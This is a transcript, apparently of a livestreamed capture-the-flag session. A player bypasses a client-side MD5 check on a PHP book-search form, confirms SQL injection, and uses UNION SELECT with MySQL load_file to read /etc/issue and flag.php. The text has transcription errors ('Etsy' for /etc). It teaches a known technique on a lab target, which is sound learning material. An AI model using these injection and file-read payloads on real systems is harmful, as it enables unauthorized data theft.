Unix doesn't let you do that. I don't know why PHP lets you basically dot out of a file. Well, that's just PHP being special, I guess. Shall we move on? I think we shall move on. I'm done with Ghostbusters. Robert's books. The flag is in flag.php. My name's Robert and I like books. Check out my collection. Keyword dark. Yeah, we get one result. Keyword A. And we get some results. SDF. We get nothing. So we're talking posts, and we get search query equals what we sent, and we get this verification parameter. Okay, if we send this to repeater, if we go ASDF1 and leave this as is, so this verification thing looks like it's being generated client side, and if it then doesn't match on the server side, we're not allowed to perform the query. So we just get JSON back, do we? Yeah, okay, cool. Interesting. So it's PHP. We have to send a search query and some verification, and we get back JSON from Apache. I mean, this has got to be being done in JavaScript. We've got MD5 minified and ROT13 being pulled in. We've got some jQuery nonsense here. var verification equals MD5 search query. Then we do a replace white space with nothing. We replace single quote with nothing globally. This is globally and case insensitive, so we also match uppercase spaces. Okay, so we've got some shenanigans going on here that are going to strip single quotes out of our query client side. And then we just got some jQuery posting and then a for each loop over the response data to basically display the table. Okay. I mean, this is going to annoy us. We have to do our own MD5 for the verification string. I mean, we've got a couple of options here, but we should just be able to go MD5 ASDF and get this back here, which matches that there. Is it just a straight up MD5? (912EC). Yeah, just straight up MD5. But I mean, if we start chucking in single quotes, SDF single quote, then we get a bad query because I mean it sent off probably the correct verification, but stole the single quote out of our search query by look. No, we didn't want sequencer. If we go and put the single quote back in, then we get empty array. Okay. Just comment out the two lines. Yeah, but then I'd have to save it and reopen it. I mean, I don't think you can. Can you edit JavaScript in the inspection thingo? Can you seriously edit JavaScript live like this? No, that didn't work. And we've got a couple of options. Either we can just kind of go on MD5 somehow, ASDF single quote, and go off to repeater and do stuff. Or I mean, we could just go like A or 1 equals 1. We've got a single quote, space, space. We'd send that and then just come back up and fix it up in here again. A or 1 equals 1, dash, dash, space, dash. That's what I sent you. It's complaining about that. B5 over that. That's what I said. That worked. And we got all the stuff back. Neat. What if we do like or 1 equals 2? We get nothing back. So we got what seems to be SQL injection. We just got to do this little dance to have the verification token work. I mean, what does that give us? Because we know that, yeah, we know that flags in flag.php. What does this give us? I mean, do we expect to be able to read files with the SQL injection? There's no admin login. There shouldn't be anything of value. I'm not going crazy. It did say flags in flag.php, yeah. So it's not like there's a users table we can dump and get the creds of. There's no authentication to bypass. Maybe it's just a file disk via MySQL. If we've got the what's the easiest way to exploit this? If we can control that part of the search query, probably in a where clause, can we do a union? Use the get system exploit. I'm just waiting for someone to port it to Ruby first. Well, 1 equals 2. I mean, how many? 1, 2, 3, 4 fields. What did I just copy? The hash. Yeah, cool. So we just did, we basically topped off the first half of the query with something that we know will return 0 rows, and then we just told it to go and, hey, add that to the data set 1, 2, 3, 4, and we get back 1, 2, 3, 4. I'm feeling title number 2. What if we were able to change this number 2 into the contents of a file? Is it just load file? So there's a function in MySQL, if we are talking a MySQL database, which we could validate in a couple of ways, or we could just jump straight for the jugular. Load file, MySQL load file reads the file and returns the file contents as a string. To use this function, the file must be located on the host server, must specify the full path, and the user must have the file privilege. The file must be readable. Size must be less than the max allowed packet bytes. Returns null if the file doesn't exist or can't be read. example. That's into out file. That's not load file. That's load data in file. That's not load file. Really? Does this example have nothing to do with MySQL load underscore file? I feel like I'm taking crazy pills. Anyway, let's just give it a go. Instead of the number 2, let's do load file /sli/issue. Hey, it worked. We can read files. So that's just Etsy issues, just one of my favorite little files to basically steal, to prove I can steal files. It's smaller than Etsy password and it doesn't have sensitive data. It just shows, like on my box here, Etsy issue just shows Debian stretch. On Menstrual's server, it shows Ubuntu 16.04. Fun fact, did you know that Ubuntu is an African word for I don't know how to install Debian? There you go, the more you know. So instead of loading the file Etsy issue, what are we going to do? It's called flag.php. Sorry, Menstrual, I didn't mean to be mean with that joke. I just love that joke. Load file var dub. Var dub. What was working for that previous challenge? So I forget where Ubuntu puts its stuff. Var dub HTML default about. That wasn't it. Var dub HTML. Var dub HTML flag.php. So we're gonna union into the null data set. The value is 1. The contents of flag.php loaded as a file.